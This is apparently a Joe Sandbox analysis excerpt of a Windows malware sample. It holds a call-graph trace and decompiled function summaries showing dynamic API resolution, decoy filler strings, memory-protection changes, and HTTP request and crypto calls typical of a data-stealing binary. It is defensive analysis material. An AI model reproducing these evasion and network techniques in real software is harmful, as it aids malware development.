38326->38327 38328 364610 2 API calls 38327->38328 38329 363a5a 38328->38329 38330 364610 2 API calls 38329->38330 38331 363a73 38330->38331 38332 364610 2 API calls 38331->38332 38333 363a8c 38332->38333 38334 364610 2 API calls 38333->38334 38335 363aa5 38334->38335 38336 364610 2 API calls 38335->38336 38337 363abe 38336->38337 38338 364610 2 API calls 38337->38338 38339 363ad7 38338->38339 38340 364610 2 API calls 38339->38340 38341 363af0 38340->38341 38342 364610 2 API calls 38341->38342 38343 363b09 38342->38343 38344 364610 2 API calls 38343->38344 38345 363b22 38344->38345 38346 364610 2 API calls 38345->38346 38347 363b3b 38346->38347 38348 364610 2 API calls 38347->38348 38349 363b54 38348->38349 38350 364610 2 API calls 38349->38350 38351 363b6d 38350->38351 38352 364610 2 API calls 38351->38352 38353 363b86 38352->38353 38354 364610 2 API calls 38353->38354 38355 363b9f 38354->38355 38356 364610 2 API calls 38355->38356 38357 363bb8 38356->38357 38358 364610 2 API calls 38357->38358 38359 363bd1 38358->38359 38360 364610 2 API calls 38359->38360 38361 363bea 38360->38361 38362 364610 2 API calls 38361->38362 38363 363c03 38362->38363 38364 364610 2 API calls 38363->38364 38365 363c1c 38364->38365 38366 364610 2 API calls 38365->38366 38367 363c35 38366->38367 38368 364610 2 API calls 38367->38368 38369 363c4e 38368->38369 38370 364610 2 API calls 38369->38370 38371 363c67 38370->38371 38372 364610 2 API calls 38371->38372 38373 363c80 38372->38373 38374 364610 2 API calls 38373->38374 38375 363c99 38374->38375 38376 364610 2 API calls 38375->38376 38377 363cb2 38376->38377 38378 364610 2 API calls 38377->38378 38379 363ccb 38378->38379 38380 364610 2 API calls 38379->38380 38381 363ce4 38380->38381 38382 364610 2 API calls 38381->38382 38383 363cfd 38382->38383 38384 364610 2 API calls 38383->38384 38385 363d16 38384->38385 38386 364610 2 API calls 38385->38386 38387 363d2f 38386->38387 38388 364610 2 API calls 38387->38388 38389 363d48 38388->38389 38390 364610 2 API calls 38389->38390 38391 363d61 38390->38391 38392 364610 2 API calls 38391->38392 38393 363d7a 38392->38393 38394 364610 2 API calls 38393->38394 38395 363d93 38394->38395 38396 364610 2 API calls 38395->38396 38397 363dac 38396->38397 38398 364610 2 API calls 38397->38398 38399 363dc5 38398->38399 38400 364610 2 API calls 38399->38400 38401 363dde 38400->38401 38402 364610 2 API calls 38401->38402 38403 363df7 38402->38403 38404 364610 2 API calls 38403->38404 38405 363e10 38404->38405 38406 364610 2 API calls 38405->38406 38407 363e29 38406->38407 38408 364610 2 API calls 38407->38408 38409 363e42 38408->38409 38410 364610 2 API calls 38409->38410 38411 363e5b 38410->38411 38412 364610 2 API calls 38411->38412 38413 363e74 38412->38413 38414 364610 2 API calls 38413->38414 38415 363e8d 38414->38415 38416 364610 2 API calls 38415->38416 38417 363ea6 38416->38417 38418 364610 2 API calls 38417->38418 38419 363ebf 38418->38419 38420 364610 2 API calls 38419->38420 38421 363ed8 38420->38421 38422 364610 2 API calls 38421->38422 38423 363ef1 38422->38423 38424 364610 2 API calls 38423->38424 38425 363f0a 38424->38425 38426 364610 2 API calls 38425->38426 38427 363f23 38426->38427 38428 364610 2 API calls 38427->38428 38429 363f3c 38428->38429 38430 364610 2 API calls 38429->38430 38431 363f55 38430->38431 38432 364610 2 API calls 38431->38432 38433 363f6e 38432->38433 38434 364610 2 API calls 38433->38434 38435 363f87 38434->38435 38436 364610 2 API calls 38435->38436 38437 363fa0 38436->38437 38438 364610 2 API calls 38437->38438 38439 363fb9 38438->38439 38440 364610 2 API calls 38439->38440 38441 363fd2 38440->38441 38442 364610 2 API calls 38441->38442 38443 363feb 38442->38443 38444 364610 2 API calls 38443->38444 38445 364004 38444->38445 38446 364610 2 API calls 38445->38446 38447 36401d 38446->38447 38448 364610 2 API calls 38447->38448 38449 364036 38448->38449 38450 364610 2 API calls 38449->38450 38451 36404f 38450->38451 38452 364610 2 API calls 38451->38452 38453 364068 38452->38453 38454 364610 2 API calls 38453->38454 38455 364081 38454->38455 38456 364610 2 API calls 38455->38456 38457 36409a 38456->38457 38458 364610 2 API calls 38457->38458 38459 3640b3 38458->38459 38460 364610 2 API calls 38459->38460 38461 3640cc 38460->38461 38462 364610 2 API calls 38461->38462 38463 3640e5 38462->38463 38464 364610 2 API calls 38463->38464 38465 3640fe 38464->38465 38466 364610 2 API calls 38465->38466 38467 364117 38466->38467 38468 364610 2 API calls 38467->38468 38469 364130 38468->38469 38470 364610 2 API calls 38469->38470 38471 364149 38470->38471 38472 364610 2 API calls 38471->38472 38473 364162 38472->38473 38474 364610 2 API calls 38473->38474 38475 36417b 38474->38475 38476 364610 2 API calls 38475->38476 38477 364194 38476->38477 38478 364610 2 API calls 38477->38478 38479 3641ad 38478->38479 38480 364610 2 API calls 38479->38480 38481 3641c6 38480->38481 38482 364610 2 API calls 38481->38482 38483 3641df 38482->38483 38484 364610 2 API calls 38483->38484 38485 3641f8 38484->38485 38486 364610 2 API calls 38485->38486 38487 364211 38486->38487 38488 364610 2 API calls 38487->38488 38489 36422a 38488->38489 38490 364610 2 API calls 38489->38490 38491 364243 38490->38491 38492 364610 2 API calls 38491->38492 38493 36425c 38492->38493 38494 364610 2 API calls 38493->38494 38495 364275 38494->38495 38496 364610 2 API calls 38495->38496 38497 36428e 38496->38497 38498 364610 2 API calls 38497->38498 38499 3642a7 38498->38499 38500 364610 2 API calls 38499->38500 38501 3642c0 38500->38501 38502 364610 2 API calls 38501->38502 38503 3642d9 38502->38503 38504 364610 2 API calls 38503->38504 38505 3642f2 38504->38505 38506 364610 2 API calls 38505->38506 38507 36430b 38506->38507 38508 364610 2 API calls 38507->38508 38509 364324 38508->38509 38510 364610 2 API calls 38509->38510 38511 36433d 38510->38511 38512 364610 2 API calls 38511->38512 38513 364356 38512->38513 38514 364610 2 API calls 38513->38514 38515 36436f 38514->38515 38516 364610 2 API calls 38515->38516 38517 364388 38516->38517 38518 364610 2 API calls 38517->38518 38519 3643a1 38518->38519 38520 364610 2 API calls 38519->38520 38521 3643ba 38520->38521 38522 364610 2 API calls 38521->38522 38523 3643d3 38522->38523 38524 364610 2 API calls 38523->38524 38525 3643ec 38524->38525 38526 364610 2 API calls 38525->38526 38527 364405 38526->38527 38528 364610 2 API calls 38527->38528 38529 36441e 38528->38529 38530 364610 2 API calls 38529->38530 38531 364437 38530->38531 38532 364610 2 API calls 38531->38532 38533 364450 38532->38533 38534 364610 2 API calls 38533->38534 38535 364469 38534->38535 38536 364610 2 API calls 38535->38536 38537 364482 38536->38537 38538 364610 2 API calls 38537->38538 38539 36449b 38538->38539 38540 364610 2 API calls 38539->38540 38541 3644b4 38540->38541 38542 364610 2 API calls 38541->38542 38543 3644cd 38542->38543 38544 364610 2 API calls 38543->38544 38545 3644e6 38544->38545 38546 364610 2 API calls 38545->38546 38547 3644ff 38546->38547 38548 364610 2 API calls 38547->38548 38549 364518 38548->38549 38550 364610 2 API calls 38549->38550 38551 364531 38550->38551 38552 364610 2 API calls 38551->38552 38553 36454a 38552->38553 38554 364610 2 API calls 38553->38554 38555 364563 38554->38555 38556 364610 2 API calls 38555->38556 38557 36457c 38556->38557 38558 364610 2 API calls 38557->38558 38559 364595 38558->38559 38560 364610 2 API calls 38559->38560 38561 3645ae 38560->38561 38562 364610 2 API calls 38561->38562 38563 3645c7 38562->38563 38564 364610 2 API calls 38563->38564 38565 3645e0 38564->38565 38566 364610 2 API calls 38565->38566 38567 3645f9 38566->38567 38568 379f20 38567->38568 38569 37a346 8 API calls 38568->38569 38570 379f30 43 API calls 38568->38570 38571 37a456 38569->38571 38572 37a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38569->38572 38570->38569 38573 37a526 38571->38573 38574 37a463 8 API calls 38571->38574 38572->38571 38575 37a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38573->38575 38576 37a5a8 38573->38576 38574->38573 38575->38576 38577 37a647 38576->38577 38578 37a5b5 6 API calls 38576->38578 38579 37a654 9 API calls 38577->38579 38580 37a72f 38577->38580 38578->38577 38579->38580 38581 37a7b2 38580->38581 38582 37a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38580->38582 38583 37a7ec 38581->38583 38584 37a7bb GetProcAddress GetProcAddress 38581->38584 38582->38581 38585 37a825 38583->38585 38586 37a7f5 GetProcAddress GetProcAddress 38583->38586 38584->38583 38587 37a922 38585->38587 38588 37a832 10 API calls 38585->38588 38586->38585 38589 37a98d 38587->38589 38590 37a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38587->38590 38588->38587 38591 37a996 GetProcAddress 38589->38591 38592 37a9ae 38589->38592 38590->38589 38591->38592 38593 37a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38592->38593 38594 375ef3 38592->38594 38593->38594 38595 361590 38594->38595 38865 3616b0 38595->38865 38598 37aab0 lstrcpy 38599 3615b5 38598->38599 38600 37aab0 lstrcpy 38599->38600 38601 3615c7 38600->38601 38602 37aab0 lstrcpy 38601->38602 38603 3615d9 38602->38603 38604 37aab0 lstrcpy 38603->38604 38605 361663 38604->38605 38606 375760 38605->38606 38607 375771 38606->38607 38608 37ab30 2 API calls 38607->38608 38609 37577e 38608->38609 38610 37ab30 2 API calls 38609->38610 38611 37578b 38610->38611 38612 37ab30 2 API calls 38611->38612 38613 375798 38612->38613 38614 37aa50 lstrcpy 38613->38614 38615 3757a5 38614->38615 38616 37aa50 lstrcpy 38615->38616 38617 3757b2 38616->38617 38618 37aa50 lstrcpy 38617->38618 38619 3757bf 38618->38619 38620 37aa50 lstrcpy 38619->38620 38659 3757cc 38620->38659 38621 361590 lstrcpy 38621->38659 38622 375893 StrCmpCA 38622->38659 38623 3758f0 StrCmpCA 38624 375a2c 38623->38624 38623->38659 38625 37abb0 lstrcpy 38624->38625 38626 375a38 38625->38626 38629 37ab30 2 API calls 38626->38629 38627 37aa50 lstrcpy 38627->38659 38628 37ab30 lstrlen lstrcpy 38628->38659 38630 375a46 38629->38630 38632 37ab30 2 API calls 38630->38632 38631 375aa6 StrCmpCA 38633 375be1 38631->38633 38631->38659 38634 375a55 38632->38634 38635 37abb0 lstrcpy 38633->38635 38636 3616b0 lstrcpy 38634->38636 38637 375bed 38635->38637 38656 375a61 38636->38656 38638 37ab30 2 API calls 38637->38638 38639 375bfb 38638->38639 38641 37ab30 2 API calls 38639->38641 38640 375c5b StrCmpCA 38642 375c66 Sleep 38640->38642 38643 375c78 38640->38643 38644 375c0a 38641->38644 38642->38659 38645 37abb0 lstrcpy 38643->38645 38646 3616b0 lstrcpy 38644->38646 38647 375c84 38645->38647 38646->38656 38648 37ab30 2 API calls 38647->38648 38649 375c93 38648->38649 38652 37ab30 2 API calls 38649->38652 38650 375510 25 API calls 38650->38659 38651 375440 20 API calls 38651->38659 38654 375ca2 38652->38654 38653 3759da StrCmpCA 38653->38659 38655 3616b0 lstrcpy 38654->38655 38655->38656 38656->37713 38657 375b8f StrCmpCA 38657->38659 38658 37aab0 lstrcpy 38658->38659 38659->38621 38659->38622 38659->38623 38659->38627 38659->38628 38659->38631 38659->38640 38659->38650 38659->38651 38659->38653 38659->38657 38659->38658 38660 37abb0 lstrcpy 38659->38660 38660->38659 38662 3776e3 GetVolumeInformationA 38661->38662 38663 3776dc 38661->38663 38664 377721 38662->38664 38663->38662 38665 37778c GetProcessHeap RtlAllocateHeap 38664->38665 38666 3777a9 38665->38666 38667 3777b8 wsprintfA 38665->38667 38669 37aa50 lstrcpy 38666->38669 38668 37aa50 lstrcpy 38667->38668 38670 375ff7 38668->38670 38669->38670 38670->37734 38672 37aab0 lstrcpy 38671->38672 38673 3648e9 38672->38673 38874 364800 38673->38874 38675 3648f5 38676 37aa50 lstrcpy 38675->38676 38677 364927 38676->38677 38678 37aa50 lstrcpy 38677->38678 38679 364934 38678->38679 38680 37aa50 lstrcpy 38679->38680 38681 364941 38680->38681 38682 37aa50 lstrcpy 38681->38682 38683 36494e 38682->38683 38684 37aa50 lstrcpy 38683->38684 38685 36495b InternetOpenA StrCmpCA 38684->38685 38686 364994 38685->38686 38687 364f1b InternetCloseHandle 38686->38687 38880 378cf0 38686->38880 38689 364f38 38687->38689 38895 36a210 CryptStringToBinaryA 38689->38895 38690 3649b3 38888 37ac30 38690->38888 38693 3649c6 38695 37abb0 lstrcpy 38693->38695 38700 3649cf 38695->38700 38696 37ab30 2 API calls 38697 364f55 38696->38697 38698 37acc0 4 API calls 38697->38698 38701 364f6b 38698->38701 38699 364f77 ctype 38703 37aab0 lstrcpy 38699->38703 38704 37acc0 4 API calls 38700->38704 38702 37abb0 lstrcpy 38701->38702 38702->38699 38712 364fa7 38703->38712 38705 3649f9 38704->38705 38706 37abb0 lstrcpy 38705->38706 38707 364a02 38706->38707 38708 37acc0 4 API calls 38707->38708 38709 364a21 38708->38709 38710 37abb0 lstrcpy 38709->38710 38711 364a2a 38710->38711 38713 37ac30 3 API calls 38711->38713 38712->37737 38714 364a48 38713->38714 38715 37abb0 lstrcpy 38714->38715 38716 364a51 38715->38716 38717 37acc0 4 API calls 38716->38717 38718 364a70 38717->38718 38719 37abb0 lstrcpy 38718->38719 38720 364a79 38719->38720 38721 37acc0 4 API calls 38720->38721 38722 364a98 38721->38722 38723 37abb0 lstrcpy 38722->38723 38724 364aa1 38723->38724 38725 37acc0 4 API calls 38724->38725 38726 364acd 38725->38726 38727 37ac30 3 API calls 38726->38727 38728 364ad4 38727->38728 38729 37abb0 lstrcpy 38728->38729 38730 364add 38729->38730 38731 364af3 InternetConnectA 38730->38731 38731->38687 38732 364b23 HttpOpenRequestA 38731->38732 38734 364f0e InternetCloseHandle 38732->38734 38735 364b78 38732->38735 38734->38687 38736 37acc0 4 API calls 38735->38736 38737 364b8c 38736->38737 38738 37abb0 lstrcpy 38737->38738 38739 364b95 38738->38739 38740 37ac30 3 API calls 38739->38740 38741 364bb3 38740->38741 38742 37abb0 lstrcpy 38741->38742 38743 364bbc 38742->38743 38744 37acc0 4 API calls 38743->38744 38745 364bdb 38744->38745 38746 37abb0 lstrcpy 38745->38746 38747 364be4 38746->38747 38748 37acc0 4 API calls 38747->38748 38749 364c05 38748->38749 38750 37abb0 lstrcpy 38749->38750 38751 364c0e 38750->38751 38752 37acc0 4 API calls 38751->38752 38753 364c2e 38752->38753 38754 37abb0 lstrcpy 38753->38754 38755 364c37 38754->38755 38756 37acc0 4 API calls 38755->38756 38757 364c56 38756->38757 38758 37abb0 lstrcpy 38757->38758 38759 364c5f 38758->38759 38760 37ac30 3 API calls 38759->38760 38761 364c7d 38760->38761 38762 37abb0 lstrcpy 38761->38762 38763 364c86 38762->38763 38764 37acc0 4 API calls 38763->38764 38765 364ca5 38764->38765 38766 37abb0 lstrcpy 38765->38766 38767 364cae 38766->38767 38768 37acc0 4 API calls 38767->38768 38769 364ccd 38768->38769 38770 37abb0 lstrcpy 38769->38770 38771 364cd6 38770->38771 38772 37ac30 3 API calls 38771->38772 38773 364cf4 38772->38773 38774 37abb0 lstrcpy 38773->38774 38775 364cfd 38774->38775 38776 37acc0 4 API calls 38775->38776 38777 364d1c 38776->38777 38778 37abb0 lstrcpy 38777->38778 38779 364d25 38778->38779 38780 37acc0 4 API calls 38779->38780 38781 364d46 38780->38781 38782 37abb0 lstrcpy 38781->38782 38783 364d4f 38782->38783 38784 37acc0 4 API calls 38783->38784 38785 364d6f 38784->38785 38786 37abb0 lstrcpy 38785->38786 38787 364d78 38786->38787 38788 37acc0 4 API calls 38787->38788 38789 364d97 38788->38789 38790 37abb0 lstrcpy 38789->38790 38791 364da0 38790->38791 38792 37ac30 3 API calls 38791->38792 38793 364dbe 38792->38793 38794 37abb0 lstrcpy 38793->38794 38795 364dc7 38794->38795 38796 37aa50 lstrcpy 38795->38796 38797 364de2 38796->38797 38798 37ac30 3 API calls 38797->38798 38799 364e03 38798->38799 38800 37ac30 3 API calls 38799->38800 38801 364e0a 38800->38801 38802 37abb0 lstrcpy 38801->38802 38803 364e16 38802->38803 38804 364e37 lstrlen 38803->38804 38805 364e4a 38804->38805 38806 364e53 lstrlen 38805->38806 38894 37ade0 38806->38894 38808 364e63 HttpSendRequestA 38809 364e82 InternetReadFile 38808->38809 38810 364eb7 InternetCloseHandle 38809->38810 38815 364eae 38809->38815 38813 37ab10 38810->38813 38812 37acc0 4 API calls 38812->38815 38813->38734 38814 37abb0 lstrcpy 38814->38815 38815->38809 38815->38810 38815->38812 38815->38814 38901 37ade0 38816->38901 38818 371a14 StrCmpCA 38819 371a1f ExitProcess 38818->38819 38820 371a27 38818->38820 38821 371c12 38820->38821 38822 371b1f StrCmpCA 38820->38822 38823 371afd StrCmpCA 38820->38823 38824 371b63 StrCmpCA 38820->38824 38825 371b82 StrCmpCA 38820->38825 38826 371b41 StrCmpCA 38820->38826 38827 371ba1 StrCmpCA 38820->38827 38828 371bc0 StrCmpCA 38820->38828 38829 371acf StrCmpCA 38820->38829 38830 371aad StrCmpCA 38820->38830 38831 37ab30 lstrlen lstrcpy 38820->38831 38821->37739 38822->38820 38823->38820 38824->38820 38825->38820 38826->38820 38827->38820 38828->38820 38829->38820 38830->38820 38831->38820 38832->37745 38833->37747 38834->37753 38835->37755 38836->37761 38837->37763 38838->37767 38839->37771 38840->37775 38841->37781 38842->37783 38843->37787 38844->37801 38845->37805 38846->37804 38847->37800 38848->37804 38849->37822 38850->37807 38851->37809 38852->37813 38853->37818 38854->37819 38855->37825 38856->37832 38857->37834 38858->37857 38859->37861 38860->37862 38861->37858 38862->37862 38863->37871 38866 37aab0 lstrcpy 38865->38866 38867 3616c3 38866->38867 38868 37aab0 lstrcpy 38867->38868 38869 3616d5 38868->38869 38870 37aab0 lstrcpy 38869->38870 38871 3616e7 38870->38871 38872 37aab0 lstrcpy 38871->38872 38873 3615a3 38872->38873 38873->38598 38875 364816 38874->38875 38876 364888 lstrlen 38875->38876 38900 37ade0 38876->38900 38878 364898 InternetCrackUrlA 38879 3648b7 38878->38879 38879->38675 38881 37aa50 lstrcpy 38880->38881 38882 378d04 38881->38882 38883 37aa50 lstrcpy 38882->38883 38884 378d12 GetSystemTime 38883->38884 38885 378d29 38884->38885 38886 37aab0 lstrcpy 38885->38886 38887 378d8c 38886->38887 38887->38690 38889 37ac41 38888->38889 38890 37ac98 38889->38890 38892 37ac78 lstrcpy lstrcat 38889->38892 38891 37aab0 lstrcpy 38890->38891 38893 37aca4 38891->38893 38892->38890 38893->38693 38894->38808 38896 364f3e 38895->38896 38897 36a249 LocalAlloc 38895->38897 38896->38696 38896->38699 38897->38896 38898 36a264 CryptStringToBinaryA 38897->38898 38898->38896 38899 36a289 LocalFree 38898->38899 38899->38896 38900->38878 38901->38818

                                    Executed Functions

                                    Function 00379BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 660 379bb0-379bc4 call 379aa0 663 379de3-379e42 LoadLibraryA * 5 660->663 664 379bca-379dde call 379ad0 GetProcAddress * 21 660->664 666 379e44-379e58 GetProcAddress 663->666 667 379e5d-379e64 663->667 664->663 666->667 669 379e96-379e9d 667->669 670 379e66-379e91 GetProcAddress * 2 667->670 671 379e9f-379eb3 GetProcAddress 669->671 672 379eb8-379ebf 669->672 670->669 671->672 673 379ec1-379ed4 GetProcAddress 672->673 674 379ed9-379ee0 672->674 673->674 675 379ee2-379f0c GetProcAddress * 2 674->675 676 379f11-379f12 674->676 675->676
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,00F306F0), ref: 00379BF1
                                    • GetProcAddress.KERNEL32(75900000,00F30648), ref: 00379C0A
                                    • GetProcAddress.KERNEL32(75900000,00F30840), ref: 00379C22
                                    • GetProcAddress.KERNEL32(75900000,00F30570), ref: 00379C3A
                                    • GetProcAddress.KERNEL32(75900000,00F30588), ref: 00379C53
                                    • GetProcAddress.KERNEL32(75900000,00F38AA0), ref: 00379C6B
                                    • GetProcAddress.KERNEL32(75900000,00F264E0), ref: 00379C83
                                    • GetProcAddress.KERNEL32(75900000,00F26280), ref: 00379C9C
                                    • GetProcAddress.KERNEL32(75900000,00F305A0), ref: 00379CB4
                                    • GetProcAddress.KERNEL32(75900000,00F30690), ref: 00379CCC
                                    • GetProcAddress.KERNEL32(75900000,00F305B8), ref: 00379CE5
                                    • GetProcAddress.KERNEL32(75900000,00F305D0), ref: 00379CFD
                                    • GetProcAddress.KERNEL32(75900000,00F26660), ref: 00379D15
                                    • GetProcAddress.KERNEL32(75900000,00F30708), ref: 00379D2E
                                    • GetProcAddress.KERNEL32(75900000,00F305E8), ref: 00379D46
                                    • GetProcAddress.KERNEL32(75900000,00F26520), ref: 00379D5E
                                    • GetProcAddress.KERNEL32(75900000,00F30600), ref: 00379D77
                                    • GetProcAddress.KERNEL32(75900000,00F308D0), ref: 00379D8F
                                    • GetProcAddress.KERNEL32(75900000,00F26300), ref: 00379DA7
                                    • GetProcAddress.KERNEL32(75900000,00F308E8), ref: 00379DC0
                                    • GetProcAddress.KERNEL32(75900000,00F26540), ref: 00379DD8
                                    • LoadLibraryA.KERNEL32(00F308A0,?,00376CA0), ref: 00379DEA
                                    • LoadLibraryA.KERNEL32(00F30888,?,00376CA0), ref: 00379DFB
                                    • LoadLibraryA.KERNEL32(00F308B8,?,00376CA0), ref: 00379E0D
                                    • LoadLibraryA.KERNEL32(00F30900,?,00376CA0), ref: 00379E1F
                                    • LoadLibraryA.KERNEL32(00F30918,?,00376CA0), ref: 00379E30
                                    • GetProcAddress.KERNEL32(75070000,00F30858), ref: 00379E52
                                    • GetProcAddress.KERNEL32(75FD0000,00F30870), ref: 00379E73
                                    • GetProcAddress.KERNEL32(75FD0000,00F38CA0), ref: 00379E8B
                                    • GetProcAddress.KERNEL32(75A50000,00F38E68), ref: 00379EAD
                                    • GetProcAddress.KERNEL32(74E50000,00F26460), ref: 00379ECE
                                    • GetProcAddress.KERNEL32(76E80000,00F38A90), ref: 00379EEF
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00379F06
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00379EFA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: 500fa5f346fc56c3dd6b8ce99ed37eb4ba5d5f7d72f7c6bb63169efa5686bb50
                                    • Instruction ID: c425959363f13a9fc1f38a5c7330f015a0a1b1de1fe3a2c785f036a890f7842d
                                    • Opcode Fuzzy Hash: 500fa5f346fc56c3dd6b8ce99ed37eb4ba5d5f7d72f7c6bb63169efa5686bb50
                                    • Instruction Fuzzy Hash: 09A1FEF6518204AFC364DFA9EC88A5677EBE74D701714B61AB909C3A70D734A640DFE0
                                    Function 00364610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 764 364610-3646e5 RtlAllocateHeap 781 3646f0-3646f6 764->781 782 36479f-3647f9 VirtualProtect 781->782 783 3646fc-36479a 781->783 783->781
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0036465E
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 003647EC
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003646A7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364667
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364707
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364688
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003646B2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003646C8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364784
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036467D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364779
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036479F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364728
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003647CB
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364693
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003647AA
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003646BD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364672
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364712
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036478F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003647C0
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003646D3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003647B5
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364763
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036476E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003646FC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0036471D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00364638
                                    Memory Dump Source
